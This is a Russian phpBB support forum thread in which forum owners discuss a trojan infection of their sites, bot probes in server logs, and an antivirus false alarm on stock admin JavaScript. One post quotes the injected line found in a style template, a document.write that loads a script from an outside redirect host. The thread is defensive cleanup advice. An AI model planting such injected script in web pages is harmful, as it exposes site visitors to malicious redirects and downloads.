Как убить Трояна?
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
).
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение

-
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 7 месяцев
- Благодарил (а): 1 раз
Как убить Трояна?
обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
-
- phpBB 3.0.0 RC2
- Сообщения: 1540
- Стаж: 13 лет 3 месяца
- Благодарил (а): 49 раз
- Поблагодарили: 77 раз
Re: Как убить Трояна?
Вспомнив точно, когда я видел в телефоне нормальный сайт, скачал бэкап и сравнил его со вчерашней версией. Как я и предполагал (много почитав в интернетах), что скорее всего нужно искать в js файлах. Нашлось несовпадение в папке шабона одного из стилей. Вот код, который прописался в самом конце
Все почистил, пароли поменяны, редиректа больше нет.
Код: Выделить всё
<!-- js-tools -->
document.write('<script type="text/javascript" src="http://mlvjs19.org/?acc=12242&waponly=opt&zona=0&landing=xcust"></script>');
<!-- /js-tools -->
-
- phpBB 3.3.0
- Сообщения: 11121
- Стаж: 15 лет 3 месяца
- Откуда: fotovideoforum.ru
- Благодарил (а): 670 раз
- Поблагодарили: 122 раза
Re: Как убить Трояна?
Может вопрос не к месту...Но тем не менее...в логах хостера наблюдаются вот такие запросы к несуществующим файлам...Что это и откуда могет быть?
Там таких файлов в корне никак не может быть..."12645" [Fri Oct 25 23:56:16 2013] [error] [client 110.87.141.50] script not found or unable to stat: /www/caldinac/www/htdocs/signup.php
"12645" [Fri Oct 25 23:56:28 2013] [error] [client 110.87.141.50] script not found or unable to stat: /www/caldinac/www/htdocs/signup.php
"12645" [Fri Oct 25 23:56:36 2013] [error] [client 110.87.141.50] script not found or unable to stat: /www/caldinac/www/htdocs/register.php
"12645" [Fri Oct 25 23:57:06 2013] [error] [client 110.87.141.50] script not found or unable to stat: /www/caldinac/www/htdocs/profile.php
"12645" [Sat Oct 26 00:01:25 2013] [error] [client 66.249.75.206] script not found or unable to stat: /www/caldinac/www/htdocs/go.php
"12645" [Sat Oct 26 00:34:47 2013] [error] [client 178.137.91.234] script not found or unable to stat: /www/caldinac/www/htdocs/admin.php
NIKON-D90, AF-S 18-105, AF-S 14-24, AF-S 24-70
-
- Former team member
- Сообщения: 1965
- Стаж: 15 лет 1 месяц
- Благодарил (а): 57 раз
- Поблагодарили: 622 раза
Re: Как убить Трояна?
За-то у 2.0.23 могут быть эти файлы. Стоял когда-нибудь такой?
Не пишите вопросы лично, если можете задать их на форуме!
Спецзаказы не интересуют!
Спецзаказы не интересуют!
-
- phpBB 3.2.6
- Сообщения: 5954
- Стаж: 15 лет
- Откуда: Сергиев Посад
- Благодарил (а): 295 раз
- Поблагодарили: 287 раз
Re: Как убить Трояна?
Боты. Не обращай внимания.
За ваши деньги решу ваши проблемы. Стучи в ЛС.
Нет человека - нет проблемы. (c)
Нет человека - нет проблемы. (c)
-
- phpBB 3.0.0 RC7
- Сообщения: 1798
- Стаж: 12 лет 11 месяцев
- Благодарил (а): 97 раз
- Поблагодарили: 91 раз
- Забанен: Бессрочно
Re: Как убить Трояна?
Обычные школьники с обычными скриптами пытаются найти доступ в админку. Не стоит обращать внимания.Пчелкин писал(а):Может вопрос не к месту...Но тем не менее...в логах хостера наблюдаются вот такие запросы к несуществующим файлам...Что это и откуда могет быть?
phpBBex
-
- phpBB 3.3.0
- Сообщения: 11121
- Стаж: 15 лет 3 месяца
- Откуда: fotovideoforum.ru
- Благодарил (а): 670 раз
- Поблагодарили: 122 раза
Re: Как убить Трояна?
Да...этот форум был переведен с двойки...
Типа у них запросы на такие старые весчи делаются? афигеть...Просщупывают или не имеют автоопределения куда попали и как?владимир1983 писал(а):Боты. Не обращай внимания.
NIKON-D90, AF-S 18-105, AF-S 14-24, AF-S 24-70
-
- Former team member
- Сообщения: 1965
- Стаж: 15 лет 1 месяц
- Благодарил (а): 57 раз
- Поблагодарили: 622 раза
Re: Как убить Трояна?
Создай эти файлы и редиректи в чат, а там спроси - "чего надобно старче?" :-D
Не пишите вопросы лично, если можете задать их на форуме!
Спецзаказы не интересуют!
Спецзаказы не интересуют!
-
- phpBB 3.0.0 RC7
- Сообщения: 1798
- Стаж: 12 лет 11 месяцев
- Благодарил (а): 97 раз
- Поблагодарили: 91 раз
- Забанен: Бессрочно
Re: Как убить Трояна?
Зачем? Проще спамить всеми возможными вариантами. Быстрее выходит.Пчелкин писал(а):Просщупывают или не имеют автоопределения куда попали и как?
phpBBex
Re: Как убить Трояна?
Пчелкин, немного не по теме, но как параноик со стажем замечу, что у Вас на фотовидефоруме открыт каталог стилей (тырь - не хочу) и в php.ini включен expose_php (есть пасхалки и прочее), что позволяет идентифицировать версии используемого ПО. Остальные мелочи несущественны))
-
- phpBB 3.3.0
- Сообщения: 11121
- Стаж: 15 лет 3 месяца
- Откуда: fotovideoforum.ru
- Благодарил (а): 670 раз
- Поблагодарили: 122 раза
Re: Как убить Трояна?
А вот с этого места подробнейc61 писал(а):открыт каталог стилей
(а Вас, Штирлиц. я попрошу остаться(с))
Разговор был не про мой форум...про чужой.....
Добавлено спустя 1 минуту 58 секунд:
Идея прикольная, но у них нет чата...хотя мысль подхватил...Anvar писал(а):Создай эти файлы и редиректи в чат, а там спроси - "чего надобно старче?"
NIKON-D90, AF-S 18-105, AF-S 14-24, AF-S 24-70
-
- Former team member
- Сообщения: 1965
- Стаж: 15 лет 1 месяц
- Благодарил (а): 57 раз
- Поблагодарили: 622 раза
Re: Как убить Трояна?
c61, спасибо, пошел стили Пчелкина качать, а то все откладывал в дальний ящик :-D
Не пишите вопросы лично, если можете задать их на форуме!
Спецзаказы не интересуют!
Спецзаказы не интересуют!
-
- phpBB 3.3.0
- Сообщения: 11121
- Стаж: 15 лет 3 месяца
- Откуда: fotovideoforum.ru
- Благодарил (а): 670 раз
- Поблагодарили: 122 раза
Re: Как убить Трояна?
Ну ну...побейся аб стену.... гы...
NIKON-D90, AF-S 18-105, AF-S 14-24, AF-S 24-70
-
- phpBB 1.0.0
- Сообщения: 3
- Стаж: 11 лет 3 месяца
Re: Как убить Трояна?
добрый день!
Установил phpbb 3.0.12. После установки не могу зайти в админку, не пускает касперский, говорит что объект заражен HEUR:Trojan.Script.Generic. причем сам форум работает.
Комп проверил на вирусы - чисто!
Паменял все пароли - не помогло!
Подозрительных ссылок на другие ресурсы в коде нет! проверил!
Никакой переадресации нет!
файлы Index.* все чистые с бэкапа!
Помогите, что сделать?? как исправить?
Установил phpbb 3.0.12. После установки не могу зайти в админку, не пускает касперский, говорит что объект заражен HEUR:Trojan.Script.Generic. причем сам форум работает.
Комп проверил на вирусы - чисто!
Паменял все пароли - не помогло!
Подозрительных ссылок на другие ресурсы в коде нет! проверил!
Никакой переадресации нет!
файлы Index.* все чистые с бэкапа!
Помогите, что сделать?? как исправить?
-
- phpBB 1.0.0
- Сообщения: 3
- Стаж: 11 лет 3 месяца
Re: Как убить Трояна?
нашел, что каспер ругается на следующий скрипт, который прописан в файле phpBB3\adm\style\overall_header.html
после его удаления в админку пускает касперский.
Что это за подозрительный скрипт???? и что он делает?
скрипт
<script type="text/javascript">
// <![CDATA[
var jump_page = '{LA_JUMP_PAGE}:';
var on_page = '{ON_PAGE}';
var per_page = '{PER_PAGE}';
var base_url = '{A_BASE_URL}';
var menu_state = 'shown';
/**
* Jump to page
*/
function jumpto()
{
var page = prompt(jump_page, on_page);
if (page !== null && !isNaN(page) && page == Math.floor(page) && page > 0)
{
if (base_url.indexOf('?') == -1)
{
document.location.href = base_url + '?start=' + ((page - 1) * per_page);
}
else
{
document.location.href = base_url.replace(/&/g, '&') + '&start=' + ((page - 1) * per_page);
}
}
}
/**
* Set display of page element
* s[-1,0,1] = hide,toggle display,show
*/
function dE(n, s, type)
{
if (!type)
{
type = 'block';
}
var e = document.getElementById(n);
if (!s)
{
s = (e.style.display == '') ? -1 : 1;
}
e.style.display = (s == 1) ? type : 'none';
}
/**
* Mark/unmark checkboxes
* id = ID of parent container, name = name prefix, state = state [true/false]
*/
function marklist(id, name, state)
{
var parent = document.getElementById(id);
if (!parent)
{
eval('parent = document.' + id);
}
if (!parent)
{
return;
}
var rb = parent.getElementsByTagName('input');
for (var r = 0; r < rb.length; r++)
{
if (rb[r].name.substr(0, name.length) == name)
{
rb[r].checked = state;
}
}
}
/**
* Find a member
*/
function find_username(url)
{
popup(url, 760, 570, '_usersearch');
return false;
}
/**
* Window popup
*/
function popup(url, width, height, name)
{
if (!name)
{
name = '_popup';
}
window.open(url.replace(/&/g, '&'), name, 'height=' + height + ',resizable=yes,scrollbars=yes, width=' + width);
return false;
}
/**
* Hiding/Showing the side menu
*/
function switch_menu()
{
var menu = document.getElementById('menu');
var main = document.getElementById('main');
var toggle = document.getElementById('toggle');
var handle = document.getElementById('toggle-handle');
switch (menu_state)
{
// hide
case 'shown':
main.style.width = '93%';
menu_state = 'hidden';
menu.style.display = 'none';
toggle.style.width = '20px';
handle.style.backgroundImage = 'url(images/toggle.gif)';
handle.style.backgroundRepeat = 'no-repeat';
<!-- IF S_CONTENT_DIRECTION eq 'rtl' -->
handle.style.backgroundPosition = '0% 50%';
toggle.style.left = '96%';
<!-- ELSE -->
handle.style.backgroundPosition = '100% 50%';
toggle.style.left = '0';
<!-- ENDIF -->
break;
// show
case 'hidden':
main.style.width = '76%';
menu_state = 'shown';
menu.style.display = 'block';
toggle.style.width = '5%';
handle.style.backgroundImage = 'url(images/toggle.gif)';
handle.style.backgroundRepeat = 'no-repeat';
<!-- IF S_CONTENT_DIRECTION eq 'rtl' -->
handle.style.backgroundPosition = '100% 50%';
toggle.style.left = '75%';
<!-- ELSE -->
handle.style.backgroundPosition = '0% 50%';
toggle.style.left = '15%';
<!-- ENDIF -->
break;
}
}
// ]]>
</script>
// <![CDATA[
var jump_page = '{LA_JUMP_PAGE}:';
var on_page = '{ON_PAGE}';
var per_page = '{PER_PAGE}';
var base_url = '{A_BASE_URL}';
var menu_state = 'shown';
/**
* Jump to page
*/
function jumpto()
{
var page = prompt(jump_page, on_page);
if (page !== null && !isNaN(page) && page == Math.floor(page) && page > 0)
{
if (base_url.indexOf('?') == -1)
{
document.location.href = base_url + '?start=' + ((page - 1) * per_page);
}
else
{
document.location.href = base_url.replace(/&/g, '&') + '&start=' + ((page - 1) * per_page);
}
}
}
/**
* Set display of page element
* s[-1,0,1] = hide,toggle display,show
*/
function dE(n, s, type)
{
if (!type)
{
type = 'block';
}
var e = document.getElementById(n);
if (!s)
{
s = (e.style.display == '') ? -1 : 1;
}
e.style.display = (s == 1) ? type : 'none';
}
/**
* Mark/unmark checkboxes
* id = ID of parent container, name = name prefix, state = state [true/false]
*/
function marklist(id, name, state)
{
var parent = document.getElementById(id);
if (!parent)
{
eval('parent = document.' + id);
}
if (!parent)
{
return;
}
var rb = parent.getElementsByTagName('input');
for (var r = 0; r < rb.length; r++)
{
if (rb[r].name.substr(0, name.length) == name)
{
rb[r].checked = state;
}
}
}
/**
* Find a member
*/
function find_username(url)
{
popup(url, 760, 570, '_usersearch');
return false;
}
/**
* Window popup
*/
function popup(url, width, height, name)
{
if (!name)
{
name = '_popup';
}
window.open(url.replace(/&/g, '&'), name, 'height=' + height + ',resizable=yes,scrollbars=yes, width=' + width);
return false;
}
/**
* Hiding/Showing the side menu
*/
function switch_menu()
{
var menu = document.getElementById('menu');
var main = document.getElementById('main');
var toggle = document.getElementById('toggle');
var handle = document.getElementById('toggle-handle');
switch (menu_state)
{
// hide
case 'shown':
main.style.width = '93%';
menu_state = 'hidden';
menu.style.display = 'none';
toggle.style.width = '20px';
handle.style.backgroundImage = 'url(images/toggle.gif)';
handle.style.backgroundRepeat = 'no-repeat';
<!-- IF S_CONTENT_DIRECTION eq 'rtl' -->
handle.style.backgroundPosition = '0% 50%';
toggle.style.left = '96%';
<!-- ELSE -->
handle.style.backgroundPosition = '100% 50%';
toggle.style.left = '0';
<!-- ENDIF -->
break;
// show
case 'hidden':
main.style.width = '76%';
menu_state = 'shown';
menu.style.display = 'block';
toggle.style.width = '5%';
handle.style.backgroundImage = 'url(images/toggle.gif)';
handle.style.backgroundRepeat = 'no-repeat';
<!-- IF S_CONTENT_DIRECTION eq 'rtl' -->
handle.style.backgroundPosition = '100% 50%';
toggle.style.left = '75%';
<!-- ELSE -->
handle.style.backgroundPosition = '0% 50%';
toggle.style.left = '15%';
<!-- ENDIF -->
break;
}
}
// ]]>
</script>
Что это за подозрительный скрипт???? и что он делает?
-
- Former team member
- Сообщения: 2317
- Стаж: 15 лет 5 месяцев
- Благодарил (а): 20 раз
- Поблагодарили: 221 раз
Re: Как убить Трояна?
Regal скорее не на это , а на то что ты передаешь в одну из переменных из фигурных скобок
Код: Выделить всё
var jump_page = '{LA_JUMP_PAGE}:';
var on_page = '{ON_PAGE}';
var per_page = '{PER_PAGE}';
var base_url = '{A_BASE_URL}';
Помощь в ЛС/email только за WM или ЮMoney